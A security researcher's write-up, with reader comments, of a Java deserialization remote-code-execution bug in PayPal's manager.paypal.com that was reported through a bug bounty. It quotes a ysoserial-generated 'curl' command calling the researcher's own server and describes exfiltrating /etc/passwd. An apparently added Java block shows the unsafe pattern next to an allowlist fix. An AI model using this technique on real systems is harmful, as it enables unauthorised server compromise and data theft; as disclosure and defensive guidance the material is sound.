In December 2015, I found a critical vulnerability in one of PayPal's business websites (manager.paypal.com). It allowed me to execute arbitrary shell commands on PayPal web servers via unsafe Java object deserialization and to access production databases. I immediately reported this bug to the PayPal security team, and it was fixed promptly.
While testing the manager.paypal.com application, I noticed an unusual POST form parameter, “oldFormData”, that looked like a complex object after base64 decoding:
Details
Further research showed that it is a Java serialized object without any signature. This means you can send a serialized object of any serializable class present on the server, and the “readObject” (or “readResolve”) method of that class will be called. For exploitation, you need to find a suitable class in the application's “classpath” that can be serialized and has something interesting (from an exploitation point of view) in its “readObject” method.
You can read about this technique in the recent article by FoxGlove Security. A year ago, Chris Frohoff (@frohoff) and Gabriel Lawrence (@gebl) did a great job and found suitable classes in the Commons Collections library that could lead to remote code execution. They also published the “ysoserial” payload generation tool on their GitHub page.
Exploit
I downloaded this tool and generated a simple payload that sends DNS and HTTP requests to my own server by executing the “curl x.s.artsploit.com/paypal” shell command.
Then I sent the base64-encoded payload in the “oldFormData” parameter to the application server and was impressed to see an incoming request from the PayPal network appear in my NGINX access log:
I realized that I could execute arbitrary OS commands on the web servers of manager.paypal.com, establish a back connection to my own Internet server and, for example, upload and execute a backdoor. As a result, I could get access to the production databases used by the manager.paypal.com application. Instead, I just read the “/etc/passwd” file by sending it to my server as proof of the vulnerability:
I also recorded a video showing how to reproduce this vulnerability and reported it to the PayPal security team.
Later, I found out that many other endpoints of the manager.paypal.com application also use serialized objects and can be exploited as well.
In a month, my report received a Duplicate status because another researcher, Mark Litchfield, reported a similar vulnerability two days earlier than I did (on December 11, 2015). PayPal decided to pay me a good bounty anyway, and I have nothing but respect for them.
Comments

Did they pay you thru paypal? :)

Thanks

Very nice work. It would be cool if you would reference advice on how to fix a Java serialization vulnerability. A Google search gave me poor results in the first page :(

https://www.google.co.uk/search?q=how+to+fix+a+java+serialization+vulnerability
Otherwise we can expect the improvements to be very slow....

1. Identify any jar or class files that contain the vulnerable library, e.g. cd && grep -Rl 'InvokerTransformer' . | grep -E "\.(jar|class)"
2. Delete (dry run first) the file InvokerTransformer.class within any JARs you found in Step 1.

The problem lies with the Serialization API itself.

https://github.com/pfirmstone/river-internet/tree/Input-validation-for-Serialization/src/org/apache/river/api/io
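Added example (my own, not code from the article, from PayPal or from the commenters), serving both the Details section and the comment asking how to fix a Java serialization vulnerability: the unsafe handler pattern the article describes next to a look-ahead allowlist variant that rejects unexpected classes before their “readObject” runs. The real fix is not to accept client-supplied serialized objects at all (or to sign them); the allowlist is the fallback where that is unavoidable. FormData, the parameter handling and the allowed class names are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.util.Base64;
import java.util.Set;

public class FormDataDeserializer {
    // Hypothetical form bean standing in for the real "oldFormData" object.
    static final class FormData implements java.io.Serializable {
        String merchantName;
        Integer page;
    }

    // Unsafe pattern from the article: any Serializable class on the classpath is
    // instantiated and its readObject/readResolve runs before a cast could fail.
    static Object unsafeDecode(String oldFormData) throws IOException, ClassNotFoundException {
        byte[] raw = Base64.getDecoder().decode(oldFormData);
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(raw))) {
            return in.readObject();
        }
    }

    // Look-ahead allowlist: resolveClass is called for every class descriptor in the
    // stream (superclasses included, hence Number for Integer) before that class is
    // instantiated, so a gadget class is rejected before any of its callbacks execute.
    static final Set<String> ALLOWED = Set.of(
        FormData.class.getName(), "java.lang.String", "java.lang.Integer", "java.lang.Number");

    static final class LookAheadObjectInputStream extends ObjectInputStream {
        LookAheadObjectInputStream(byte[] raw) throws IOException {
            super(new ByteArrayInputStream(raw));
        }
        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            if (!ALLOWED.contains(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "not on the deserialization allowlist");
            }
            return super.resolveClass(desc);
        }
    }

    static FormData safeDecode(String oldFormData) throws IOException, ClassNotFoundException {
        byte[] raw = Base64.getDecoder().decode(oldFormData);
        try (ObjectInputStream in = new LookAheadObjectInputStream(raw)) {
            return (FormData) in.readObject();
        }
    }
}
```

On Java 9 and later the same policy can be expressed without subclassing through ObjectInputFilter (ObjectInputStream.setObjectInputFilter), which also lets you cap stream depth and array sizes; a rejected class surfaces as an InvalidClassException that the handler should log as a potential attack.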
which tool was that?

> I downloaded this tool and generated a simple payload that sends DNS and HTTP requests to my own server by executing the “curl x.s.artsploit.com/paypal” shell command.
Good post. Apart from programming bugs, PayPal and Stripe too are common online payment platforms....

I would be looking forward to a similar post for Stripe too...
Thanks